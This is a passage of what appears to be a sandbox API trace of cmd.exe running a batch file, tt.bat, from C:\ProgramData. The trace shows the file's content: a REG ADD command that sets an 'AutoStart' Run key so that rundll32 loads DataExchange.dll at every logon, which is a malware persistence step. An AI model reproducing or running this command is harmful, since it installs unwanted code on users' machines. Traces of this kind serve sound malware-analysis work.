lpType=0x2eeba0*=0x0, lpData=0x2eebc0*=0x1, lpcbData=0x2eeba4*=0x1000) returned 0x2 [0213.389] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x4, lpData=0x2eebc0*=0x0, lpcbData=0x2eeba4*=0x4) returned 0x0 [0213.389] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x4, lpData=0x2eebc0*=0x40, lpcbData=0x2eeba4*=0x4) returned 0x0 [0213.389] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x4, lpData=0x2eebc0*=0x40, lpcbData=0x2eeba4*=0x4) returned 0x0 [0213.389] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x0, lpData=0x2eebc0*=0x40, lpcbData=0x2eeba4*=0x1000) returned 0x2 [0213.389] RegCloseKey (hKey=0x44) returned 0x0 [0213.390] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeba8 | out: phkResult=0x2eeba8*=0x44) returned 0x0 [0213.390] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x0, lpData=0x2eebc0*=0x40, lpcbData=0x2eeba4*=0x1000) returned 0x2 [0213.390] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x4, lpData=0x2eebc0*=0x1, lpcbData=0x2eeba4*=0x4) returned 0x0 [0213.390] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x0, lpData=0x2eebc0*=0x1, lpcbData=0x2eeba4*=0x1000) returned 0x2 [0213.390] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x4, lpData=0x2eebc0*=0x0, lpcbData=0x2eeba4*=0x4) returned 0x0 [0213.390] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x4, lpData=0x2eebc0*=0x9, lpcbData=0x2eeba4*=0x4) returned 0x0 [0213.390] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x4, lpData=0x2eebc0*=0x9, lpcbData=0x2eeba4*=0x4) returned 0x0 [0213.390] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x0, lpData=0x2eebc0*=0x9, lpcbData=0x2eeba4*=0x1000) returned 0x2 [0213.390] RegCloseKey (hKey=0x44) returned 0x0 [0213.390] time (in: timer=0x0 | out: timer=0x0) returned 0x5e8e386b [0213.390] srand (_Seed=0x5e8e386b) [0213.390] GetCommandLineW () returned="cmd.exe /c C:\\ProgramData\\tt.bat" [0213.390] GetCommandLineW () returned="cmd.exe /c C:\\ProgramData\\tt.bat" [0213.390] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dac0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0213.391] GetProcessHeap () returned 0x450000 [0213.391] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x218) returned 0x46ad20 [0213.391] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x46ad30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.391] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0213.391] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.391] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.391] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.391] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.391] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.391] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.391] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.391] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.391] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.391] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.391] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.392] GetProcessHeap () returned 0x450000 [0213.392] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4696e0 | out: hHeap=0x450000) returned 1 [0213.392] GetEnvironmentStringsW () returned 0x468bc0* [0213.392] GetProcessHeap () returned 0x450000 [0213.392] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb28) returned 0x46ba70 [0213.392] FreeEnvironmentStringsW (penv=0x468bc0) returned 1 [0213.392] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.392] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.392] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.392] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.392] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.392] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.392] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.392] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.392] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.392] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.392] GetProcessHeap () returned 0x450000 [0213.392] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x44) returned 0x468a20 [0213.392] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef9b0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0213.393] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef9b0, lpFilePart=0x2ef990 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x2ef990*="Desktop") returned 0x19 [0213.393] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0213.393] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef6c0 | out: lpFindFileData=0x2ef6c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xb20000b2, cFileName="Users", cAlternateFileName="")) returned 0x46c5a0 [0213.393] FindClose (in: hFindFile=0x46c5a0 | out: hFindFile=0x46c5a0) returned 1 [0213.393] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x2ef6c0 | out: lpFindFileData=0x2ef6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xb20000b2, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x46c5a0 [0213.393] FindClose (in: hFindFile=0x46c5a0 | out: hFindFile=0x46c5a0) returned 1 [0213.393] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", lpFindFileData=0x2ef6c0 | out: lpFindFileData=0x2ef6c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xb20000b2, cFileName="Desktop", cAlternateFileName="")) returned 0x46c5a0 [0213.394] FindClose (in: hFindFile=0x46c5a0 | out: hFindFile=0x46c5a0) returned 1 [0213.394] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0213.394] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 1 [0213.394] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Desktop") returned 1 [0213.394] GetProcessHeap () returned 0x450000 [0213.394] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46ba70 | out: hHeap=0x450000) returned 1 [0213.394] GetEnvironmentStringsW () returned 0x46ba70* [0213.394] GetProcessHeap () returned 0x450000 [0213.394] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb28) returned 0x468bc0 [0213.394] FreeEnvironmentStringsW (penv=0x46ba70) returned 1 [0213.394] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dac0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0213.394] GetProcessHeap () returned 0x450000 [0213.394] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468a20 | out: hHeap=0x450000) returned 1 [0213.394] GetProcessHeap () returned 0x450000 [0213.394] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4016) returned 0x46ba70 [0213.395] GetProcessHeap () returned 0x450000 [0213.395] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x40) returned 0x46fac0 [0213.395] GetProcessHeap () returned 0x450000 [0213.395] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46ba70 | out: hHeap=0x450000) returned 1 [0213.395] GetConsoleOutputCP () returned 0x1b5 [0213.395] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dabfe0 | out: lpCPInfo=0x49dabfe0) returned 1 [0213.395] GetUserDefaultLCID () returned 0x409 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49da7b50, cchData=8 | out: lpLCData=":") returned 2 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efac0, cchData=128 | out: lpLCData="0") returned 2 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efac0, cchData=128 | out: lpLCData="0") returned 2 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efac0, cchData=128 | out: lpLCData="1") returned 2 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dba740, cchData=8 | out: lpLCData="/") returned 2 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dba4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dba460, cchData=32 | out: lpLCData="Tue") returned 4 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dba420, cchData=32 | out: lpLCData="Wed") returned 4 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dba3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dba3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dba360, cchData=32 | out: lpLCData="Sat") returned 4 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dba700, cchData=32 | out: lpLCData="Sun") returned 4 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49da7b40, cchData=8 | out: lpLCData=".") returned 2 [0213.396] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dba4e0, cchData=8 | out: lpLCData=",") returned 2 [0213.397] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.397] GetProcessHeap () returned 0x450000 [0213.397] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20c) returned 0x469760 [0213.398] GetConsoleTitleW (in: lpConsoleTitle=0x469760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x778b0000 [0213.398] GetProcAddress (hModule=0x778b0000, lpProcName="CopyFileExW") returned 0x778c23d0 [0213.398] GetProcAddress (hModule=0x778b0000, lpProcName="IsDebuggerPresent") returned 0x778b8290 [0213.398] GetProcAddress (hModule=0x778b0000, lpProcName="SetConsoleInputExeNameW") returned 0x778c17e0 [0213.398] GetProcessHeap () returned 0x450000 [0213.398] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4012) returned 0x46ba70 [0213.398] GetProcessHeap () returned 0x450000 [0213.398] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46ba70 | out: hHeap=0x450000) returned 1 [0213.400] _wcsicmp (_String1="C:\\ProgramData\\tt.bat", _String2=")") returned 58 [0213.400] _wcsicmp (_String1="FOR", _String2="C:\\ProgramData\\tt.bat") returned 3 [0213.400] _wcsicmp (_String1="FOR/?", _String2="C:\\ProgramData\\tt.bat") returned 3 [0213.400] _wcsicmp (_String1="IF", _String2="C:\\ProgramData\\tt.bat") returned 6 [0213.400] _wcsicmp (_String1="IF/?", _String2="C:\\ProgramData\\tt.bat") returned 6 [0213.400] _wcsicmp (_String1="REM", _String2="C:\\ProgramData\\tt.bat") returned 15 [0213.400] _wcsicmp (_String1="REM/?", _String2="C:\\ProgramData\\tt.bat") returned 15 [0213.400] GetProcessHeap () returned 0x450000 [0213.400] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb0) returned 0x469980 [0213.400] GetProcessHeap () returned 0x450000 [0213.400] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c) returned 0x46fb10 [0213.401] GetConsoleTitleW (in: lpConsoleTitle=0x2ef9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.402] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef560, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef540, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef540*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0213.402] GetProcessHeap () returned 0x450000 [0213.402] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x218) returned 0x469a40 [0213.402] GetProcessHeap () returned 0x450000 [0213.402] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c) returned 0x46fb60 [0213.402] _wcsnicmp (_String1="C:\\P", _String2="cmd ", _MaxCount=0x4) returned -51 [0213.402] GetProcessHeap () returned 0x450000 [0213.402] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x420) returned 0x469c60 [0213.402] SetErrorMode (uMode=0x0) returned 0x8001 [0213.403] SetErrorMode (uMode=0x1) returned 0x0 [0213.403] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\.", nBufferLength=0x208, lpBuffer=0x469c70, lpFilePart=0x2ef260 | out: lpBuffer="C:\\ProgramData", lpFilePart=0x2ef260*="ProgramData") returned 0xe [0213.403] SetErrorMode (uMode=0x8001) returned 0x1 [0213.403] GetProcessHeap () returned 0x450000 [0213.403] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x469c60, Size=0x3c) returned 0x469c60 [0213.403] GetProcessHeap () returned 0x450000 [0213.403] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x469c60) returned 0x3c [0213.403] NeedCurrentDirectoryForExePathW (ExeName="C:\\ProgramData\\.") returned 1 [0213.403] GetProcessHeap () returned 0x450000 [0213.403] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x34) returned 0x466640 [0213.403] GetProcessHeap () returned 0x450000 [0213.403] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x54) returned 0x468a20 [0213.404] GetProcessHeap () returned 0x450000 [0213.404] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x468a20, Size=0x34) returned 0x468a20 [0213.404] GetProcessHeap () returned 0x450000 [0213.404] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x468a20) returned 0x34 [0213.404] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.404] GetProcessHeap () returned 0x450000 [0213.404] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe8) returned 0x469cb0 [0213.408] GetProcessHeap () returned 0x450000 [0213.408] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x469cb0, Size=0x7e) returned 0x469cb0 [0213.408] GetProcessHeap () returned 0x450000 [0213.408] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x469cb0) returned 0x7e [0213.409] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.409] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\tt.bat", fInfoLevelId=0x1, lpFindFileData=0x2eefd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eefd0) returned 0x469d40 [0213.409] GetProcessHeap () returned 0x450000 [0213.409] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x464670 [0213.409] FindClose (in: hFindFile=0x469d40 | out: hFindFile=0x469d40) returned 1 [0213.410] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0213.410] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0213.410] GetConsoleTitleW (in: lpConsoleTitle=0x2ef520, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.410] GetProcessHeap () returned 0x450000 [0213.410] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1e8) returned 0x469d40 [0213.410] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe9f0000 [0213.416] GetProcAddress (hModule=0x7fefe9f0000, lpProcName="SaferIdentifyLevel") returned 0x7fefea0e470 [0213.416] IdentifyCodeAuthzLevelW () returned 0x1 [0213.423] GetProcAddress (hModule=0x7fefe9f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefea0f9b0 [0213.423] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0213.424] GetProcAddress (hModule=0x7fefe9f0000, lpProcName="SaferCloseLevel") returned 0x7fefea0f660 [0213.424] CloseCodeAuthzLevel () returned 0x1 [0213.424] SetErrorMode (uMode=0x0) returned 0x8001 [0213.424] SetErrorMode (uMode=0x1) returned 0x0 [0213.424] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\tt.bat", nBufferLength=0x104, lpBuffer=0x469a50, lpFilePart=0x2ef350 | out: lpBuffer="C:\\ProgramData\\tt.bat", lpFilePart=0x2ef350*="tt.bat") returned 0x15 [0213.424] SetErrorMode (uMode=0x8001) returned 0x1 [0213.424] GetProcessHeap () returned 0x450000 [0213.424] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c) returned 0x46fca0 [0213.424] CmdBatNotification () returned 0x0 [0213.425] CreateFileW (lpFileName="C:\\ProgramData\\tt.bat" (normalized: "c:\\programdata\\tt.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ef3b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0213.425] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0213.425] _get_osfhandle (_FileHandle=3) returned 0x5c [0213.425] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.425] _get_osfhandle (_FileHandle=3) returned 0x5c [0213.425] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.425] ReadFile (in: hFile=0x5c, lpBuffer=0x49dac320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef1c0, lpOverlapped=0x0 | out: lpBuffer=0x49dac320*, lpNumberOfBytesRead=0x2ef1c0*=0x8b, lpOverlapped=0x0) returned 1 [0213.426] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dac320, cbMultiByte=139, lpWideCharStr=0x49dae320, cchWideChar=8191 | out: lpWideCharStr="REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v AutoStart /t REG_SZ /d \"rundll32.exe C:\\ProgramData\\DataExchange.dll,Start\"\r\n") returned 139 [0213.429] _get_osfhandle (_FileHandle=3) returned 0x5c [0213.429] GetFileType (hFile=0x5c) returned 0x1 [0213.429] _get_osfhandle (_FileHandle=3) returned 0x5c [0213.429] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8b [0213.429] GetProcessHeap () returned 0x450000 [0213.429] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4012) returned 0x471f70 [0213.429] GetProcessHeap () returned 0x450000 [0213.429] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x471f70 | out: hHeap=0x450000) returned 1 [0213.430] GetProcessHeap () returned 0x450000 [0213.430] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb0) returned 0x46bbb0 [0213.430] GetProcessHeap () returned 0x450000 [0213.430] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x471890 [0213.432] GetProcessHeap () returned 0x450000 [0213.432] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x11e) returned 0x46bc70 [0213.432] _tell (_FileHandle=3) returned 139 [0213.432] _close (_FileHandle=3) returned 0 [0213.432] _vsnwprintf (in: _Buffer=0x49db6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef158 | out: _Buffer="\r\n") returned 2 [0213.432] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.432] GetFileType (hFile=0x7) returned 0x2 [0213.433] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0213.433] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef0e8 | out: lpMode=0x2ef0e8) returned 1 [0213.433] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.433] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49db6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef128, lpReserved=0x0 | out: lpBuffer=0x49db6340*, lpNumberOfCharsWritten=0x2ef128*=0x2) returned 1 [0213.433] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0213.433] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dac0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0213.434] _vsnwprintf (in: _Buffer=0x49d9eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2ef168 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop") returned 25 [0213.434] _vsnwprintf (in: _Buffer=0x49d9eb92, _BufferCount=0x3e5, _Format="%c", _ArgList=0x2ef168 | out: _Buffer=">") returned 1 [0213.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.434] GetFileType (hFile=0x7) returned 0x2 [0213.434] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0213.434] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef118 | out: lpMode=0x2ef118) returned 1 [0213.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.434] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49d9eb60*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ef158, lpReserved=0x0 | out: lpBuffer=0x49d9eb60*, lpNumberOfCharsWritten=0x2ef158*=0x1a) returned 1 [0213.436] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.436] GetFileType (hFile=0x7) returned 0x2 [0213.436] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0213.436] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef3f8 | out: lpMode=0x2ef3f8) returned 1 [0213.436] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.436] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4718a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2ef438, lpReserved=0x0 | out: lpBuffer=0x4718a0*, lpNumberOfCharsWritten=0x2ef438*=0x3) returned 1 [0213.437] _vsnwprintf (in: _Buffer=0x49db6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef438 | out: _Buffer=" ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v AutoStart /t REG_SZ /d \"rundll32.exe C:\\ProgramData\\DataExchange.dll,Start\" ") returned 135 [0213.437] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.437] GetFileType (hFile=0x7) returned 0x2 [0213.437] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0213.437] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef3c8 | out: lpMode=0x2ef3c8) returned 1 [0213.437] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.437] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49db6340*, nNumberOfCharsToWrite=0x87, lpNumberOfCharsWritten=0x2ef408, lpReserved=0x0 | out: lpBuffer=0x49db6340*, lpNumberOfCharsWritten=0x2ef408*=0x87) returned 1 [0213.438] _vsnwprintf (in: _Buffer=0x49db6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef438 | out: _Buffer="\r\n") returned 2 [0213.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.438] GetFileType (hFile=0x7) returned 0x2 [0213.438] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0213.438] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef3c8 | out: 